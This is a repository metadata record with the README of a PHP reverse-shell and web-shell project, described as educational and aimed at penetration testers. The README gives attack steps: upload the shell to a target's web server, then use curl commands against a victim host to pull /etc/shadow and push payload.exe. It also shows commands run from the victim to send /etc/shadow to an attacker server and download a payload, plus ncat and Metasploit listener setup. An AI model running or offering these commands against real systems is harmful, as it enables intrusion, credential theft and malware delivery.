{"id":15374449,"url":"https://github.com/ivan-sincek/php-reverse-shell","last_synced_at":"2025-04-05T04:13:55.871Z","repository":{"id":37273305,"uuid":"279512984","full_name":"ivan-sincek/php-reverse-shell","owner":"ivan-sincek","description":"PHP shells that work on Linux OS, macOS, and Windows OS.","archived":false,"fork":false,"pushed_at":"2023-10-03T09:48:21.000Z","size":473,"stargazers_count":477,"open_issues_count":0,"forks_count":152,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-29T03:09:24.315Z","etag":null,"topics":["bind-shell","bind-tcp","ethical-hacking","linux","macos","networking","offensive-security","oscp","penetration-testing","php","red-team-engagement","reverse-shell","reverse-tcp","security","tcp","web","web-penetration-testing","web-shell","windows"],"latest_commit_sha":null,"homepage":"","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ivan-sincek.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-07-14T07:22:54.000Z","updated_at":"2025-03-21T22:41:53.000Z","dependencies_parsed_at":"2024-10-16T14:01:14.878Z","dependency_job_id":"f5822d8b-8980-4e09-8241-a97a3448927f","html_url":"https://github.com/ivan-sincek/php-reverse-shell","commit_stats":{"total_commits":4,"total_committers":1,"mean_commits":4.0,"dds":0.0,"last_synced_commit":"9c5fc8326abc243a7b2591bf7b3691bf23960a8c"},"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fphp-reverse-shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fphp-reverse-shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fphp-reverse-shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ivan-sincek%2Fphp-reverse-shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ivan-sincek","download_url":"https://codeload.github.com/ivan-sincek/php-reverse-shell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247284951,"owners_count":20913704,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bind-shell","bind-tcp","ethical-hacking","linux","macos","networking","offensive-security","oscp","penetration-testing","php","red-team-engagement","reverse-shell","reverse-tcp","security","tcp","web","web-penetration-testing","web-shell","windows"],"created_at":"2024-10-01T13:58:49.169Z","updated_at":"2025-04-05T04:13:55.849Z","avatar_url":"https://github.com/ivan-sincek.png","language":"PHP","readme":"# PHP Reverse Shell\n\nJust a little refresh on the popular PHP reverse shell script [pentestmonkey/php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell). Credits to the original author!\n\nWorks on Linux OS and macOS with `/bin/sh` and Windows OS with `cmd.exe`. Script will automatically detect the underlying OS.\n\nWorks with both, `ncat` and `multi/handler`.\n\nTested on XAMPP for Linux v7.3.19 (64-bit) with PHP v7.3.19 on Kali Linux v2020.2 (64-bit).\n\nTested on XAMPP for OS X v7.4.10 (64-bit) with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit).\n\nTested on XAMPP for Windows v7.4.3 (64-bit) with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit).\n\nIn addition, everything was tested on Docker images [nouphet/docker-php4](https://hub.docker.com/r/nouphet/docker-php4) with PHP v4.4.0 and [steeze/php52-nginx](https://hub.docker.com/r/steeze/php52-nginx) with PHP v5.2.17.\n\nMade for educational purposes. I hope it will help!\n\n**Process pipes on Windows OS do not support asynchronous operations so `stream_set_blocking()`, `stream_select()`, and `feof()` will not work properly, but I found a workaround.**\n\n## Table of Contents\n\n* [Reverse Shells](#reverse-shells)\n* [Web Shells](#web-shells)\n* [File Upload/Download Script](#file-uploaddownload-script)\n\t* [Case 1: Upload the Script to the Victim’s Server](#case-1-upload-the-script-to-the-victims-server)\n\t* [Case 2: Upload the Script to Your Server](#case-2-upload-the-script-to-your-server)\n* [Set Up a Listener](#set-up-a-listener)\n* [Images](#images)\n\n## Reverse Shells\n\n[/src/reverse/php_reverse_shell.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php) requires PHP v5.0.0 or greater.\n\n[/src/reverse/php_reverse_shell_older.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell_older.php) requires PHP v4.3.0 or greater.\n\n**Change the IP address and port number inside the scripts as necessary.**\n\nCopy [/src/reverse/php_reverse_shell.php](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php) to your server's web root directory (e.g. to /opt/lampp/htdocs/ on XAMPP) or upload it to your target's web server.\n\nNavigate to the file with your preferred web browser.\n\n## Web Shells\n\nCheck the [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_post.php) based on HTTP POST request.\n\nCheck the [simple PHP web shell](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get.php) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.\n\nCheck the [simple PHP web shell v2](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/simple_php_web_shell_get_v2.php) based on HTTP GET request. You must [URL encode](https://www.urlencoder.org) your commands.\n\nFind out more about PHP obfuscation techniques for old versions of PHP at [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF). Credits to the author!\n\n## File Upload/Download Script\n\nCheck the [simple PHP file upload/download script](https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/web/files.php) based on HTTP POST request for file upload and HTTP GET request for file download.\n\nWhen downloading a file, you must [URL encode](https://www.urlencoder.org) the file path, and don't forget to specify the output file if using cURL.\n\nWhen uploading a file, don't forget to specify `@` before the file path.\n\nDepending on the server configuration, downloading a file through HTTP GET request parameter might not always work, instead, you will have to hardcore the file path in the script.\n\n### Case 1: Upload the Script to the Victim’s Server\n\nNavigate to the script on the victim's web server with your preferred web browser, or use cURL from you PC.\n\nUpload a file to the server's web root directory from your PC:\n\n```fundamental\ncurl -skL -X POST https://victim.com/files.php -F file=@/root/payload.exe\n```\n\nDownload a file from the server to your PC:\n\n```fundamental\ncurl -skL -X GET https://victim.com/files.php?file=/etc/shadow -o shadow\n```\n\nIf you elevated your initial privileges within your reverse shell, this script might not have the same privileges as the shell. In that case, to download a certain file, you might need to copy the file to the web root directory and set the necessary read permissions.\n\n### Case 2: Upload the Script to Your Server\n\nFrom your PHP reverse shell, run the following cURL commands.\n\nUpload a file from the victim's PC to your server's web root directory:\n\n```fundamental\ncurl -skL -X POST https://my-server.com/files.php -F file=@/etc/shadow\n```\n\nDownload a file from your server's web root directory to the victim's PC:\n\n```fundamental\ncurl -skL -X GET https://my-server.com/files.php?file=/root/payload.exe -o payload.exe\n\ncurl -skL -X GET https://my-server.com/payload.exe -o payload.exe\n```\n\n## Set Up a Listener\n\nTo set up a listener, open your preferred console on Kali Linux and run one of the examples below.\n\nSet up `ncat` listener:\n\n```fundamental\nncat -nvlp 9000\n```\n\nSet up `multi/handler` listener:\n\n```fundamental\nmsfconsole -q\n\nuse exploit/multi/handler\n\nset PAYLOAD windows/shell_reverse_tcp\n\nset LHOST 192.168.8.185\n\nset LPORT 9000\n\nexploit\n```\n\n## Images\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/php-reverse-shell/blob/master/img/ncat.png\" alt=\"Ncat\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 1 - Ncat\u003c/p\u003e\n\n\u003cp align=\"center\"\u003e\u003cimg src=\"https://github.com/ivan-sincek/php-reverse-shell/blob/master/img/scripts_dump.jpg\" alt=\"Script Dump\"\u003e\u003c/p\u003e\n\n\u003cp align=\"center\"\u003eFigure 2 - Script's Dump\u003c/p\u003e\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fphp-reverse-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fphp-reverse-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fphp-reverse-shell/lists"}